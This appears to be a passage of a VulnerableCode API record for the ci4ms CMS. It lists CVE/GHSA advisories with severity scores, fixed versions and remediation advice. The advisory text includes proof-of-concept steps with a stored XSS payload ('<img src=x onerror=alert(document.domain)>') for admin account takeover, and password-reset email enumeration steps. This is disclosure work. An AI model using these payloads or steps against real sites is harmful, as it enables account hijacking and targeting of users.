                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-vfhx-5459-qhqh",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-08T16:09:11Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-vfhx-5459-qhqh"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39394",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39394"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vfhx-5459-qhqh",
                    "reference_id": "GHSA-vfhx-5459-qhqh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vfhx-5459-qhqh"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1015581?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-cd9w-5f22-xkfk"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110229?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-39394",
                "GHSA-vfhx-5459-qhqh"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w12h-33nr-bufh"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89443?format=api",
            "vulnerability_id": "VCID-x3ze-8mnc-p7ak",
            "summary": "CI4MS: Menu Management (Pages) Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary  \n### **Vulnerability: Stored DOM XSS via Pages Added to Menu (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsafe Rendering of Page Entries in Menu Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when **adding Pages to navigation menus** through the Menu Management functionality. Page-related data selected via the Pages section is stored server-side and rendered without proper output encoding.\n\nThis stored payload is later rendered unsafely within administrative interfaces and public-facing navigation menus, leading to stored DOM-based cross-site scripting (XSS).\n\n### Affected Functionality\n- Menu Management – Pages section\n- Adding pages to navigation menus\n- Menu storage and rendering logic\n\n### Attack Scenario\n- An attacker creates or controls a page containing a malicious JavaScript payload.\n- The attacker adds the page to the menu using the **Pages** functionality in Menu Manager.\n- The application stores the menu entry without sanitization or encoding.\n- The payload persists and executes whenever the menu is rendered in administrative or public-facing interfaces.\n\n### Impact\n- Persistent Stored DOM XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users\n- Full administrator account takeover\n- Full account takeover across all roles via the navigation menu\n- Full compromise of the entire application due to global execution in the navigation menu\n\n**Endpoint:**\n- `/backend/menu/`\n\n## Steps To Reproduce (POC)\n1. Navigate to the **Menu Management** section of the application.\n2. Use the **Pages** functionality to add a page containing an XSS payload such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save the menu entry.\n4. View the menu in the administrative panel or any public-facing page.\n5. Observe the JavaScript payload executing automatically when the menu is rendered.\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n  - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n  - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n  - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n  - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n  These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n# Ready Video POC:\nhttps://mega.nz/file/2c8lHSBQ#vwFDj0vhq7vLwMJjBjnAgbHWiIdFqUxAA913H_yQExQ",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34564",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05058",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05035",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05043",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06082",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34564"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T13:53:15Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-g4pp-fhgf-8653",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T13:53:15Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-g4pp-fhgf-8653"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34564",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34564"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-g4pp-fhgf-8653",
                    "reference_id": "GHSA-g4pp-fhgf-8653",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-g4pp-fhgf-8653"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34564",
                "GHSA-g4pp-fhgf-8653"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x3ze-8mnc-p7ak"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49927?format=api",
            "vulnerability_id": "VCID-y5t2-vxku-muhj",
            "summary": "CI4MS Vulnerable to User Email Enumeration via Password Reset Flow\n**Summary**\n\nThe authentication implementation in CI4MS is vulnerable to email enumeration. An unauthenticated attacker can determine whether an email address is registered in the system by analyzing the application's response during the password reset process.\n\n**Vulnerability Details**\n\n- The password reset flow returns different responses based on whether the provided email address exists in the database or not.\n- If the email is registered, the system typically returns a success message (e.g., \"Password reset link has been sent\").\n\nIf the email is not registered, the system returns an error message (e.g., \"User not found\" or a different HTTP status code).\n\nThis discrepancy allows attackers to programmatically \"enumerate\" or confirm valid user emails, which can then be used for targeted phishing attacks or brute-force attempts.\n\n**Steps to Reproduce**\n\n1. Navigate to the password reset page of the CI4MS installation.\n2. Enter an email address that you know is not registered (e.g., nonexistent@example.com) and submit. Note the response message/code.\n3. Enter an email address that is registered (e.g., an admin or test account) and submit. Note the different response.\n4. The difference between these two responses confirms the enumeration vulnerability.\n\n**Suggested Mitigation**\n\nImplement a uniform, generic response for all password reset requests, regardless of whether the email exists. Recommended message: \"If an account is associated with this email address, a password reset link has been sent.\"",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25509",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00027",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07998",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00027",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08048",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00027",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08065",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00027",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08052",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25509"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/commit/86be2930d1c54eb7575102563302b2f3bafcb653",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-04T16:30:42Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/commit/86be2930d1c54eb7575102563302b2f3bafcb653"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25509",
                    "reference_id": "CVE-2026-25509",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25509"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-654x-9q7r-g966",
                    "reference_id": "GHSA-654x-9q7r-g966",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-654x-9q7r-g966"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-654x-9q7r-g966",
                    "reference_id": "GHSA-654x-9q7r-g966",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-04T16:30:42Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-654x-9q7r-g966"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/73772?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.28.5%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.28.5%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-25509",
                "GHSA-654x-9q7r-g966"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y5t2-vxku-muhj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89264?format=api",
            "vulnerability_id": "VCID-ye3h-3tu7-p3e7",
            "summary": "CI4MS: Profile & User Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability 1: Stored DOM XSS via Profile Name Update (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized User Name in Profile Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when users update their profile name (e.g., full name / username). An attacker can inject a malicious JavaScript payload into their profile name, which is then stored server-side.\n\nThis stored payload is later rendered unsafely in multiple application views without proper output encoding, leading to stored cross-site scripting (XSS).\n\n### Affected Functionality\n- Profile name / full name update functionality (both the 2 user inputs)\n- User profile storage and retrieval logic\n\n### Attack Scenario\n- An attacker updates their profile name to include a malicious XSS payload.\n- The application stores this value without sanitization or encoding.\n- The payload persists and executes whenever the name is rendered in affected views.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Foundation for privilege escalation and account takeover when viewed by privileged users & normal ones across blogs and public facing pages that show user profiles full names\n\nEndpoint: `/backend/users/profile/`\n\n### **Vulnerability 2: Stored XSS via User Name Rendering Across Multiple Endpoints (Privilege Escalation)**\n(Required for the chain)\n- Stored XSS via Unsafe Rendering of User Names Across Administrative and Public Interfaces\n\n### Description\nUser-controlled profile fields (specifically the username / full name) are rendered unsafely across multiple application endpoints, including administrative and content-related interfaces. The application fails to apply proper output encoding when displaying these values.\n\nWhen an administrator accesses affected pages, the stored XSS payload executes in the administrator’s browser context, resulting in administrative privilege escalation and potential full admin account takeover.\n\nThis issue is not limited to a single endpoint and affects all areas where the username is rendered, including but not limited to:\n- User management interfaces\n- Blog pages\n- Other content or UI components displaying usernames\n\n### Attack Scenario\n- Attacker injects a malicious payload via the profile name update functionality.\n- The payload is stored persistently.\n- An administrator views the user management page or any affected interface.\n- The payload executes automatically in the admin’s browser.\n- Attacker hijacks the admin session, performs privileged actions, or fully compromises the admin account.\n\n### Impact\n- Stored XSS\n- Administrative privilege escalation\n- Full admin account takeover (including other roles)\n- Full compromise of the entire application\n\nEndpoint Example: `/backend/users/` of User Management Page\n\n## Steps To Reproduce (POC)\n1. Go to Profile Management page of the User\n2. In the 2 user inputs of the Full Name, put in any field of them a XSS Payload such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save the edit\n4. Go to User Management page as an Admin or any other role\n5. Notice the XSS alert popping up that confirms it\n6. Other endpoints as well can execute such as blogs in the public facing one \n\n### Recommended Remediation\n\n1. **Eliminate Unsafe DOM Sinks:** Remove all usage of `.html()`, `innerHTML`, and similar unsafe DOM manipulation methods throughout the application. These sinks should be replaced with safe alternatives such as `.text()` or `textContent`, which do not interpret HTML markup.\n\n2. **Implement Output Encoding:** Apply context-appropriate HTML entity encoding to all user-controlled data before rendering it in the DOM. This ensures that any special characters (e.g., `<`, `>`, `\"`, `'`) are rendered as literal text rather than interpreted as executable markup.\n\n3. **Implement Server-Side Input Sanitization:** Enforce strict input validation and sanitization on all user-controlled fields — particularly the profile name fields — at the server level before storing values in the database. Currently, no sanitization is applied to these inputs.\n\n4. **Apply Defense in Depth:** Even in cases where user input does not appear to flow directly into a dangerous sink, it should still be treated as untrusted. Attackers can and will leverage indirect data flows to exploit the application. A layered approach combining input validation, output encoding, and Content Security Policy (CSP) headers is strongly recommended.\n# Ready Video POC:\nhttps://mega.nz/file/iEVEyT4Y#f046o6ZwYBfS1kK0HNKOCFm6tL_8_SbLtWWKC1hYC4M",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34989",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15923",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15785",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15872",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15912",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34989"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-vr2g-rhm5-q4jr",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:57:55Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-vr2g-rhm5-q4jr"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34989",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34989"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vr2g-rhm5-q4jr",
                    "reference_id": "GHSA-vr2g-rhm5-q4jr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vr2g-rhm5-q4jr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1126162?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@31.0.0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110305?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@31.0.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@31.0.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34989",
                "GHSA-vr2g-rhm5-q4jr"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ye3h-3tu7-p3e7"
        }
    ],
    "fixing_vulnerabilities": [],
    "risk_score": "4.5",
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.25.1.0"
}